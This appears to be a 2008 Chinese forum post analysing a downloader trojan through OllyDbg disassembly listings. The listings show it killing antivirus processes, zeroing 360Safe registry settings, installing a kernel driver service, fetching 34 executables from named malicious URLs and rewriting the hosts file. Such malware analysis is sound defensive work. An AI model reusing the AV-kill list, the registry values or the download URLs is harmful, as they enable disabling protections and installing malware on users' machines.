这个东东有个UPX壳,脱壳就不多说了,脱完壳载入OD00412EF0 |. E8 85FFFFFF call 00412E7A ; (initial cpu selection)
00412EF5 |. 83F8 0A cmp eax, 0A
00412EF8 |. 72 3F jb short 00412F39
00412EFA |. 56 push esi
00412EFB |. BE 88304100 mov esi, 00413088 ; c:\docume~1\admini~1\locals~1\temp\78767551
00412F00 |. 56 push esi ; /Buffer => 123_.00413088
00412F01 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
00412F06 |. FF15 94104000 call dword ptr [<&kernel32.GetTempPa>; \GetTempPathA
00412F0C |. 68 20194100 push 00411920 ; /78767551
00412F11 |. 56 push esi ; |ConcatString => ""
00412F12 |. FF15 58104000 call dword ptr [<&kernel32.lstrcat>] ; \lstrcatA
00412CCC |. 6A 00 push 0 ; /hTemplateFile = NULL
00412CCE |. 6A 00 push 0 ; |Attributes = 0
00412CD0 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00412CD2 |. 6A 00 push 0 ; |pSecurity = NULL
00412CD4 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00412CD6 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00412CDB |. 50 push eax ; |FileName
00412CDC |. 32DB xor bl, bl ; |
00412CDE |. FF15 A8104000 call dword ptr [<&kernel32.C>; \CreateFileA
00412CE4 |. 8BF0 mov esi, eax
00412CE6 |. 83FE FF cmp esi, -1
00412CE9 |. 75 00 jnz short 00412CEB
00412CEB |> 8D4C24 08 lea ecx, dword ptr [esp+8]
00412CEF |. 6A 00 push 0 ; /pOverlapped = NULL
00412CF1 |. 51 push ecx ; |pBytesWritten
00412CF2 |. 68 00250000 push 2500 ; |nBytesToWrite = 2500 (9472.)
00412CF7 |. 68 B0BE4000 push 0040BEB0 ; |Buffer = 123_.0040BEB0
00412CFC |. 56 push esi ; |hFile
00412CFD |. FF15 AC104000 call dword ptr [<&kernel32.W>; \WriteFile
然后解密:0040BD0C - 0040BE94这一段的要结束的进程
kavstart.exe、kissvc.exe、kmailmon.exe、kpfw32.exe、kpfwsvc.exe、kwatch.exe、ccenter.exe、ras.exe、rstray.exe、rsagent.exe、ravtask.exe、ravstub.exe、ravmon.exe、ravmond.exe、avp.exe、360safebox.exe、360Safe.exe、Thunder5.exe、rfwmain.exe、rfwstub.exe、rfwsrv.exe
解密过程大致是:字母的位数减21H然后左移一位加上加密后字符串对应的ASCII码值
如果发现360进程,修改注册表:[HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]
"MonAccess"=dword:00000000
"SiteAccess"=dword:00000000
"ExecAccess"=dword:00000000
"ARPAccess"=dword:00000000
"weeken"=dword:00000000
"IEProtAccess"=dword:00000000
"LeakShowed"=dword:00000001
"UDiskAccess"=dword:00000001
00412C37 |. 56 push esi ; /Password
00412C38 |. 56 push esi ; |ServiceStartName
00412C39 |. 56 push esi ; |pDependencies
00412C3A |. 56 push esi ; |pTagId
00412C3B |. 56 push esi ; |LoadOrderGroup
00412C3C |. FF75 0C push dword ptr [ebp+C] ; |BinaryPathName
00412C3F |. 6A 01 push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL
00412C41 |. 6A 03 push 3 ; |StartType = SERVICE_DEMAND_START
00412C43 |. 6A 01 push 1 ; |ServiceType = SERVICE_KERNEL_DRIVER
00412C45 |. 68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS
00412C4A |. FF75 08 push dword ptr [ebp+8] ; |DisplayName
00412C4D |. FF75 08 push dword ptr [ebp+8] ; |ServiceName
00412C50 |. FF75 FC push dword ptr [ebp-4] ; |hManager
00412C53 |. FF15 20104000 call dword ptr [<&advapi>; \CreateServiceA
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kisstusb
指向临时文件夹的7876755100412D56 |. FF15 24104000 call dword ptr [<&advapi>; advapi32.StartServiceA
00412D5C |> 56 push esi
00412D5D |. FF15 00104000 call dword ptr [<&advapi>; advapi32.CloseServiceHandle
00412D63 |> FF75 08 push dword ptr [ebp+8] ; /FileName
00412D66 |. FF15 48104000 call dword ptr [<&kernel>; \DeleteFileA
00412D6C |. 68 D4184100 push 004118D4 ; /system\currentcontrolset\services\kisstusb
00412D71 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00412D76 |. FF15 EC104000 call dword ptr [<&shlwap>; \SHDeleteKeyA
004129A3 |. 50 push eax ; /Buffer
004129A4 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
004129A9 |. FF15 94104000 call dword ptr [<&kern>; \GetTempPathA
004129AF |. FF15 98104000 call dword ptr [<&kern>; [GetTickCount
004129B5 |. 50 push eax ; /<%x>
004129B6 |. 8D85 FCFEFFFF lea eax, dword ptr [e>; |
004129BC |. 50 push eax ; |<%s>
004129BD |. BE 7C2F4100 mov esi, 00412F7C ; |ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\6c0070.dll"
004129C2 |. 68 B4184100 push 004118B4 ; |%s%x.dll
004129C7 |. 56 push esi ; |s => 123_.00412F7C
004129C8 |. FF15 04114000 call dword ptr [<&user>; \wsprintfA
004124CC |. 68 4C184100 push 0041184C ; /urlmon.dll
004124D1 |. FF15 A0104000 call dword ptr [<&kernel32.>; \LoadLibraryA
004124D7 |. 68 38184100 push 00411838 ; /urldownloadtofilea
004124DC |. 50 push eax ; |hModule
004124DD |. A3 8C314100 mov dword ptr [41318C], ea>; |
004124E2 |. FF15 A4104000 call dword ptr [<&kernel32.>; \GetProcAddress
00411F98 |. FF75 08 push dword ptr [ebp+8] ; |s = "http://www.fengtianc.cn/ko.txt"
[file]
open=y
url1=http://111.gxfcd.cn/new/new1.exe
………………
url34=http://111.gxfcd.cn/new/new34.exe
count=34
0041203E |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00412043 |. 50 push eax ; |Buffer
00412044 |. FF15 90104000 call dword ptr [<&kernel32.>; \GetSystemDirectoryA
0041204A |. BF 04184100 mov edi, 00411804 ; \sadfasdf.jpg
00412957 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
0041295C |. 50 push eax ; |Buffer
0041295D |. FF15 90104000 call dword ptr [<&ker>; \GetSystemDirectoryA
00412963 |. 8D85 FCFEFFFF lea eax, dword ptr [>
00412969 |. 68 A0184100 push 004118A0 ; /\drivers\etc\hosts
0041296E |. 50 push eax ; |ConcatString
0041296F |. FF15 58104000 call dword ptr [<&ker>; \lstrcatA
00412975 |. 8D85 FCFEFFFF lea eax, dword ptr [>
0041297B |. 50 push eax
0041297C |. 68 78030000 push 378
00412981 |. 68 84164100 push 00411684 ; ASCII "http://www.fengtianc.cn/ad.jpg"
 ,改写为host文件,这个jpg其实是个txt文档内容如下:127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.1.1.1 www.cctv-100008.cn
127.1.1.1 222.73.208.141
127.0.0.3 adlaji.cn
127.1.1.1 aiyyw.com
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
119.206.206.54 www.qq.com
00411C68 |. 50 push eax ; /<%02X>
00411C69 |. 8B35 04114000 mov esi, dword ptr [<&user32.wsprin>; |USER32.wsprintfA
00411C6F |. 0FB685 6CFCFF>movzx eax, byte ptr [ebp-394] ; |
00411C76 |. 50 push eax ; |<%02X>
00411C77 |. 0FB685 6BFCFF>movzx eax, byte ptr [ebp-395] ; |
00411C7E |. 50 push eax ; |<%02X>
00411C7F |. 0FB685 6AFCFF>movzx eax, byte ptr [ebp-396] ; |
00411C86 |. 50 push eax ; |<%02X>
00411C87 |. 0FB685 69FCFF>movzx eax, byte ptr [ebp-397] ; |
00411C8E |. 50 push eax ; |<%02X>
00411C8F |. 0FB685 68FCFF>movzx eax, byte ptr [ebp-398] ; |
00411C96 |. 50 push eax ; |<%02X>
00411C97 |. 68 54174100 push 00411754 ; |%02x-%02x-%02x-%02x-%02x-%02x
00411C9C |. FF75 08 push dword ptr [ebp+8] ; |s
00411C9F |. FFD6 call esi ; \wsprintfA
后面两个应该是标志,完! | 
发表于 2008-12-10 21:36
发表于 2008-12-10 22:13
|
发表于 2008-12-11 10:19
